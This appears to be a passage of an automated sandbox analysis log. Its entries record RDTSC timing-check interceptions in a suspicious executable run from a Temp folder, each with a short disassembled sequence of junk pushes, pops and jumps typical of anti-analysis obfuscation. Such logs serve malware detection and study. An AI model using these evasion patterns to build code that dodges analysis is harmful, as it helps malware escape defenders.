                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 801E1D second address: 801E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD81D0C8426h 0x0000000a jmp 00007FD81D0C842Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FD81D0C8426h 0x00000018 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 801E3E second address: 801E42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 873AEC second address: 873AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8746AC second address: 8746B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8746B7 second address: 8746C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81D0C842Ah 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8746C5 second address: 8746E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888261h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FD81C888256h 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 874992 second address: 8749A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD81D0C842Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 874B0C second address: 874B16 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD81C88825Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 874C74 second address: 874C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8765C1 second address: 8765C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8765C5 second address: 8765C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8765C9 second address: 8765E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD81C888256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD81C888264h 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 879880 second address: 8798A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FD81D0C842Eh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8798A0 second address: 8798A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8798A6 second address: 8798AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8798AA second address: 8798AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87EA05 second address: 87EA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 jne 00007FD81D0C843Eh 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87EA18 second address: 87EA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87EB59 second address: 87EB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87F0FC second address: 87F13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007FD81C888266h 0x0000000b js 00007FD81C888256h 0x00000011 pop esi 0x00000012 jl 00007FD81C888271h 0x00000018 push ecx 0x00000019 jmp 00007FD81C88825Bh 0x0000001e push edi 0x0000001f pop edi 0x00000020 pop ecx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87F95F second address: 87F975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD81D0C8432h 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87F975 second address: 87F97D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87F97D second address: 87F981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87F981 second address: 87F9E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FD81C88825Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FD81C888269h 0x00000018 jo 00007FD81C888256h 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FD81C888264h 0x00000025 jmp 00007FD81C88825Ah 0x0000002a pop eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87F9E0 second address: 87F9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 87E2DB second address: 87E2E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88463B second address: 88463F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 88463F second address: 884651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FD81C88825Ch 0x0000000c jne 00007FD81C888256h 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 884651 second address: 884658 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 884658 second address: 884660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 805593 second address: 805597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 805597 second address: 8055AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888261h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84D445 second address: 829BA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1ED2h], ebx 0x00000010 lea eax, dword ptr [ebp+1248E1CCh] 0x00000016 or di, BFB7h 0x0000001b jns 00007FD81D0C8432h 0x00000021 ja 00007FD81D0C842Ch 0x00000027 nop 0x00000028 push edx 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c pop edx 0x0000002d pop edx 0x0000002e push eax 0x0000002f pushad 0x00000030 jmp 00007FD81D0C842Dh 0x00000035 push ebx 0x00000036 push ecx 0x00000037 pop ecx 0x00000038 pop ebx 0x00000039 popad 0x0000003a nop 0x0000003b mov ecx, ebx 0x0000003d call dword ptr [ebp+124542E4h] 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push edx 0x00000047 pop edx 0x00000048 push esi 0x00000049 pop esi 0x0000004a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DA0C second address: 84DA12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DAD3 second address: 84DAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DAD7 second address: 84DAF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FD81C888262h 0x00000012 popad 0x00000013 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DAF7 second address: 84DAFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DAFD second address: 84DB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 84DB01 second address: 84DB70 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FD81D0C8436h 0x00000011 mov eax, dword ptr [eax] 0x00000013 ja 00007FD81D0C8433h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e jmp 00007FD81D0C8439h 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 popad 0x00000029 popad 0x0000002a pop eax 0x0000002b movsx edi, cx 0x0000002e push EC898A1Eh 0x00000033 push eax 0x00000034 push edx 0x00000035 jo 00007FD81D0C8428h 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 84DD2E second address: 84DDAA instructions: 0x00000000 rdtsc 0x00000002 je 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD81C888260h 0x0000000f popad 0x00000010 mov dword ptr [esp], esi 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FD81C888258h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jmp 00007FD81C888264h 0x00000032 mov edi, 217D6F06h 0x00000037 mov cx, F6FAh 0x0000003b nop 0x0000003c jmp 00007FD81C888268h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jnp 00007FD81C888258h 0x0000004a push edi 0x0000004b pop edi 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 84DDAA second address: 84DDB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 85A124 second address: 85A1DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD81C888269h 0x0000000b popad 0x0000000c nop 0x0000000d pushad 0x0000000e mov dword ptr [ebp+12450214h], ecx 0x00000014 call 00007FD81C88825Ch 0x00000019 mov edx, dword ptr [ebp+122D29C3h] 0x0000001f pop edi 0x00000020 popad 0x00000021 push dword ptr fs:[00000000h] 0x00000028 stc 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 jmp 00007FD81C88825Eh 0x00000035 mov edi, dword ptr [ebp+122D2A5Fh] 0x0000003b mov eax, dword ptr [ebp+122D10C1h] 0x00000041 jmp 00007FD81C888263h 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007FD81C888258h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 00000015h 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 jmp 00007FD81C888268h 0x00000067 nop 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b pushad 0x0000006c popad 0x0000006d push ebx 0x0000006e pop ebx 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 85A1DC second address: 85A1F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FD81D0C8426h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jbe 00007FD81D0C8426h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 85A1F5 second address: 85A1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 85C1A0 second address: 85C1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 85D275 second address: 85D27F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 85D27F second address: 85D2B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FD81D0C8426h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007FD81D0C8433h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FD81D0C842Ch 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 85F3BC second address: 85F3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jnc 00007FD81C888256h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push ebx 0x00000011 jp 00007FD81C888256h 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD81C888260h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 86043D second address: 860464 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD81D0C8438h 0x00000008 jmp 00007FD81D0C8432h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 jns 00007FD81D0C8426h 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8614A7 second address: 8614C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81C888267h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 84E749 second address: 84E74F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 84E82C second address: 84E832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 84E832 second address: 84E867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub cx, E0E4h 0x00000010 lea eax, dword ptr [ebp+1248E210h] 0x00000016 js 00007FD81D0C842Bh 0x0000001c mov ecx, 6BB054C0h 0x00000021 nop 0x00000022 pushad 0x00000023 jmp 00007FD81D0C842Fh 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 84E867 second address: 84E8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81C888263h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FD81C88825Bh 0x00000011 nop 0x00000012 xor dword ptr [ebp+122D2714h], ebx 0x00000018 lea eax, dword ptr [ebp+1248E1CCh] 0x0000001e or dl, 00000031h 0x00000021 nop 0x00000022 jl 00007FD81C888263h 0x00000028 jmp 00007FD81C88825Dh 0x0000002d push eax 0x0000002e push edi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 pop eax 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 84E8B6 second address: 82A6D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD81D0C8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c mov edx, 42EC4D32h 0x00000011 call dword ptr [ebp+12456AD3h] 0x00000017 jbe 00007FD81D0C8438h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 82A6D3 second address: 82A6D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 82A6D7 second address: 82A6DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8838DA second address: 8838DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8838DF second address: 8838E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 8838E6 second address: 8838EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 883BB9 second address: 883BE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8437h 0x00000007 jmp 00007FD81D0C8433h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 883BE7 second address: 883BF3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD81C88825Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 883D84 second address: 883D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81D0C8430h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 883D99 second address: 883DB5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD81C88825Ch 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FD81C888256h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 884025 second address: 884029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 884029 second address: 884062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888263h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jne 00007FD81C888256h 0x00000010 jmp 00007FD81C888268h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 884062 second address: 884078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C842Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 884078 second address: 88407C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88407C second address: 884086 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD81D0C8426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE RDTSC instruction interceptor: First address: 88D517 second address: 88D51D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
